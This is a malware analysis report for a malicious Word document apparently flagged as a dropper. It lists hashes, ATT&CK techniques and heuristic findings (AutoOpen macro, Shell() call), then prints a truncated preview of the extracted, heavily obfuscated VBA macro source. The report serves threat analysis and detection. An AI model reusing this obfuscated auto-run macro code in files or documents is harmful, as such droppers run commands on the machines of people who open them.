Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c6bf7ed916a05cde…

MALICIOUS

Office (OLE)

80.6 KB Created: 2017-10-15 20:41:00 Authoring application: Microsoft Office Word First seen: 2017-10-28
MD5: 70ace950e4abcc935410a5553439369e SHA-1: 1714a042cb6cbcee27a595cb379ee7a5fce7a388 SHA-256: c6bf7ed916a05cde1046a7c9ae67efc8db465098bd73aab991244e9f3c8c7619
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro utilizes the Shell() function, indicating an attempt to execute external commands. This is a common technique for downloading and executing further malicious payloads. The ClamAV detection name 'Doc.Dropper.Agent-6348861-0' further supports its classification as a dropper.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6348861-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6348861-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10825 bytes
SHA-256: dccf1e5a2cf9ee7538e2e38f7a234c099dd3697120e3ebddac029411febb1c9f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub PPjhodSdk()
AMbbEuM = "1QtPZcqaPkcYRYUBCjLLanjzQwLdrsMHwjGZRPmjPPzcNZ1HM53ALDI41JUUQAAMPA8Q"
MfYhZsNNa = Mid(AMbbEuM, 2, 44)
IScBQjXjtUm = MfYhZsNNa
wXHiYU = "7OX1QVicCBPmiVkjvwdRNjXYVZkSujmtBQOP6WTV3"
BRswv = Mid(wXHiYU, 5, 28)
EYBrsGNkoZM = BRswv
OmbGjMpTYi = "0BIRVE4CUtkMVoftNUvXAiLSRWVVDtwtFRviXLwhvsJJlKOFjOYofiENIPVhLjwbwrGDtBVBWNbQ253E0"
LvqaKzvY = Mid(OmbGjMpTYi, 8, 68)
REdPTwiZfPP = LvqaKzvY
cNEXuNLqRR = "HB14RcvKoHjzbjAoqwUULBS0KY"
KILnidP = Mid(cNEXuNLqRR, 6, 16)
JSXjZrcziP = KILnidP
RQhanJljV = "L8SKmApjEK310GJUJV5LRA30NNKOHJW"
hnRkVGsn = Mid(RQhanJljV, 5, 4)
XDnvwRN = hnRkVGsn
ZZwSGo = "QNEBUBAH2XJTZOMSJDRKMKvqOAwDUrjiwLWJYuMOpoGOkLfFTHWrwFwV81ORHB23"
YmVTju = Mid(ZZwSGo, 22, 34)
PGwURAHOwM = YmVTju
polMRH = "2TS95F5FjEu7REG"
kZzzfICh = Mid(polMRH, 9, 3)
KdmNV = kZzzfICh
iFnLAfas = "UFBBO325TQMBWDTURW8QHOBuiCWXjtOHlIaBEwUhmEjFS3"
pWihVdf = Mid(iFnLAfas, 22, 23)
OLYAa = pWihVdf
iBVnwzzbDjH = "MB4K9ODQ4UPXEHZCjGHPmpVIObNiVIqQWMuiMuDKMitWSRCzoGiOaQ8AFW374G"
BwrXo = Mid(iBVnwzzbDjH, 14, 40)
PUZOnOwcDrl = BwrXo
XjDXUNH = "HYKBGNJ356BNFQNB6C14"
TuIqmkaSzz = Mid(XjDXUNH, 18, 1)
YwGFJt = TuIqmkaSzz
BpQWkml = "TAAQT0AHDvwJFodfqKfMLGqPNqpmDwDEwwqwYJZ31A6B"
fTWRdt = Mid(BpQWkml, 10, 28)
IhDAaBGwq = fTWRdt
hWbaKT = "NZ5LT3AVtVRJSCjcEsrkLhSPWKiKwZMwCkMuhbAFYzBOVjKsiLCrIqVSVaaJmAYTJSHhqmudrlMOOO0NKKR"
AWnpzzNvta = Mid(hWbaKT, 8, 69)
HBQrqm = AWnpzzNvta
rJiAarbZt = "" + jRGPEu + RmVfm + lmdnthw + CWBiW + qiffMX + DLvAUEY + TsBfP + wSHYI + juFhhi + mHqTO + hainZcZw + iACHGuL + "com" + "ments" + jRGPEu + RmVfm + lmdnthw + CWBiW + qiffMX + DLvAUEY + TsBfP + wSHYI + juFhhi + mHqTO + hainZcZw + iACHGuL + GDBQWR + SmaNRLBi + TbVkTz + vVwQFia + YGArTYYh
kwiFo = Right(Left((ChVAicZMJ(rJiAarbZt)), 9951), 5)
TGaSfjirck = Mid((ChVAicZMJ(rJiAarbZt)), 11394, 89)
hJMjFvN = Mid((ChVAicZMJ(rJiAarbZt)), 10167, 119)
IciEJd = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 749), 123)
GVJBGtim = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 352), 135)
MRtNjKUJwYO = Mid((ChVAicZMJ(rJiAarbZt)), 9750, 103)
bscKiw = Right(Left((ChVAicZMJ(rJiAarbZt)), 14384), 149)
FlSWOUUa = Right(Left((ChVAicZMJ(rJiAarbZt)), 7570), 76)
zVwARPvvU = Right(Left((ChVAicZMJ(rJiAarbZt)), 6176), 140)
hUKdLhIdiDp = Mid((ChVAicZMJ(rJiAarbZt)), 11245, 108)
HjarRpAj = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 12719), 26)
QGOaaMPjciX = Mid((ChVAicZMJ(rJiAarbZt)), 12976, 15)
HsDnLwh = Right(Left((ChVAicZMJ(rJiAarbZt)), 343), 100)
zUskpD = Mid((ChVAicZMJ(rJiAarbZt)), 9407, 117)
jPAauWwHh = Right(Left((ChVAicZMJ(rJiAarbZt)), 6464), 32)
UNsEjQS = Mid((ChVAicZMJ(rJiAarbZt)), 7429, 22)
ComzTJ = Right(Left((ChVAicZMJ(rJiAarbZt)), 4780), 57)
hqXMFzuIXpN = Mid((ChVAicZMJ(rJiAarbZt)), 1679, 81)
fdfOG = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 14071), 135)
QJUWE = Mid((ChVAicZMJ(rJiAarbZt)), 4984, 119)
ucBHkPDZ = Right(Left((ChVAicZMJ(rJiAarbZt)), 5611), 76)
HOPzvMaEdHW = Mid((ChVAicZMJ(rJiAarbZt)), 939, 28)
kMOAcY = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 9917), 25)
HqVzf = Mid((ChVAicZMJ(rJiAarbZt)), 1803, 139)
cGCGllHrf = Right(Left((ChVAicZMJ(rJiAarbZt)), 8880), 91)
wtRaIGj = Mid((ChVAicZMJ(rJiAarbZt)), 569, 132)
vWObAWt = Mid((ChVAicZMJ(rJiAarbZt)), 11968, 66)
uzQrtcXE = Mid((ChVAicZMJ(rJiAarbZt)), 3715, 91)
VdUjqHcb = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 3500), 40)
hPQKEmGrb = Mid((ChVAicZMJ(rJiAarbZt)), 6922, 121)
sHTlLEE = Mid((ChVAicZMJ(rJiAarbZt)), 7192, 69)
DDqKznamYT = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 6470), 75)
KSqihFnGVjc = Right(Left((ChVAicZMJ(rJiAarbZt)), 14607), 138)
dVBwiD = Mid((ChVAicZMJ(rJiAarbZt)), 10314, 71)
sdiY
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.